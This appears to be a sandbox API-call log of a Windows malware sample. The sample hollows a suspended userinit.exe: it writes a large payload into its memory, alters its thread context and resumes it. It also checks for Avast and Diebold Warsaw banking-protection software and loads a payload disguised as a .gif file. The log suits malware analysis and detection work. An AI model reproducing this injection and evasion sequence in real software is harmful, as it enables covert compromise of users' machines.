[0167.554] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.555] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.555] GlobalUnlock (hMem=0x95000c) returned 0
[0167.555] GlobalReAlloc (hMem=0x95000c, dwBytes=0x46000, uFlags=0x2) returned 0x95000c
[0167.555] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.556] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.556] GlobalUnlock (hMem=0x95000c) returned 0
[0167.556] GlobalReAlloc (hMem=0x95000c, dwBytes=0x48000, uFlags=0x2) returned 0x95000c
[0167.556] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.557] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.557] GlobalUnlock (hMem=0x95000c) returned 0
[0167.557] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4a000, uFlags=0x2) returned 0x95000c
[0167.557] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.558] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.558] GlobalUnlock (hMem=0x95000c) returned 0
[0167.558] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4c000, uFlags=0x2) returned 0x95000c
[0167.558] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.559] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.559] GlobalUnlock (hMem=0x95000c) returned 0
[0167.559] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4e000, uFlags=0x2) returned 0x95000c
[0167.559] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.560] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.560] GlobalUnlock (hMem=0x95000c) returned 0
[0167.560] GlobalReAlloc (hMem=0x95000c, dwBytes=0x50000, uFlags=0x2) returned 0x95000c
[0167.560] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.561] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.561] GlobalUnlock (hMem=0x95000c) returned 0
[0167.561] GlobalReAlloc (hMem=0x95000c, dwBytes=0x52000, uFlags=0x2) returned 0x95000c
[0167.561] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.561] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.562] GlobalUnlock (hMem=0x95000c) returned 0
[0167.562] GlobalReAlloc (hMem=0x95000c, dwBytes=0x54000, uFlags=0x2) returned 0x95000c
[0167.562] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.562] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.562] GlobalUnlock (hMem=0x95000c) returned 0
[0167.562] GlobalReAlloc (hMem=0x95000c, dwBytes=0x56000, uFlags=0x2) returned 0x95000c
[0167.562] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.563] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.563] GlobalUnlock (hMem=0x95000c) returned 0
[0167.563] GlobalReAlloc (hMem=0x95000c, dwBytes=0x58000, uFlags=0x2) returned 0x95000c
[0167.563] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.564] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.564] GlobalUnlock (hMem=0x95000c) returned 0
[0167.564] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5a000, uFlags=0x2) returned 0x95000c
[0167.564] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.565] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.565] GlobalUnlock (hMem=0x95000c) returned 0
[0167.565] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5c000, uFlags=0x2) returned 0x95000c
[0167.565] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.566] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.566] GlobalUnlock (hMem=0x95000c) returned 0
[0167.566] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5e000, uFlags=0x2) returned 0x95000c
[0167.566] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.567] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x580c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x580c10 | out: lpCommandLine="", lpProcessInformation=0x580c10*(hProcess=0x124, hThread=0x128, dwProcessId=0x844, dwThreadId=0x84c)) returned 1
[0167.570] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x9d0000
[0167.571] GetThreadContext (in: hThread=0x128, lpContext=0x9d0000 | out: lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd7000, Edx=0x0, Ecx=0x0, Eax=0xd2be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x1aff28, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0167.571] ReadProcessMemory (in: hProcess=0x124, lpBaseAddress=0x7ffd7008, lpBuffer=0x580c74, nSize=0x4, lpNumberOfBytesRead=0x580c7c | out: lpBuffer=0x580c74*, lpNumberOfBytesRead=0x580c7c*=0x4) returned 1
[0167.571] VirtualAllocEx (hProcess=0x124, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0167.571] VirtualAlloc (lpAddress=0x1aa8000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x1aa8000
[0167.578] WriteProcessMemory (in: hProcess=0x124, lpBaseAddress=0x400000, lpBuffer=0x1aa6480*, nSize=0x63000, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x1aa6480*, lpNumberOfBytesWritten=0x580c7c*=0x63000) returned 1
[0167.590] WriteProcessMemory (in: hProcess=0x124, lpBaseAddress=0x7ffd7008, lpBuffer=0x580c78*, nSize=0x4, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x580c78*, lpNumberOfBytesWritten=0x580c7c*=0x4) returned 1
[0167.591] SetThreadContext (hThread=0x128, lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd7000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x1aff28, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0167.591] ResumeThread (hThread=0x128) returned 0x1
[0167.591] VirtualFree (lpAddress=0x9d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0167.591] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.591] GlobalUnlock (hMem=0x95000c) returned 0
[0167.591] GlobalHandle (pMem=0x33d8b0) returned 0x950004
[0167.591] GlobalUnlock (hMem=0x950004) returned 0
[0167.599] Sleep (dwMilliseconds=0xe74e)
[0177.599] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0177.599] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0177.600] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0177.600] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0177.600] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130
[0177.600] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e678*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e678*=0) returned 0x0
[0177.600] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0177.600] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x5e000
[0177.600] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0177.602] GlobalLock (hMem=0x950004) returned 0x33d8b0
[0177.602] ReadFile (in: hFile=0x130, lpBuffer=0x33d8b0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0x12e68c, lpOverlapped=0x0 | out: lpBuffer=0x33d8b0*, lpNumberOfBytesRead=0x12e68c*=0x5e000, lpOverlapped=0x0) returned 1
[0177.607] CloseHandle (hObject=0x130) returned 1
[0177.608] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.608] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.608] GlobalUnlock (hMem=0x95000c) returned 0
[0177.608] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4000, uFlags=0x2) returned 0x95000c
[0177.608] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0177.609] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
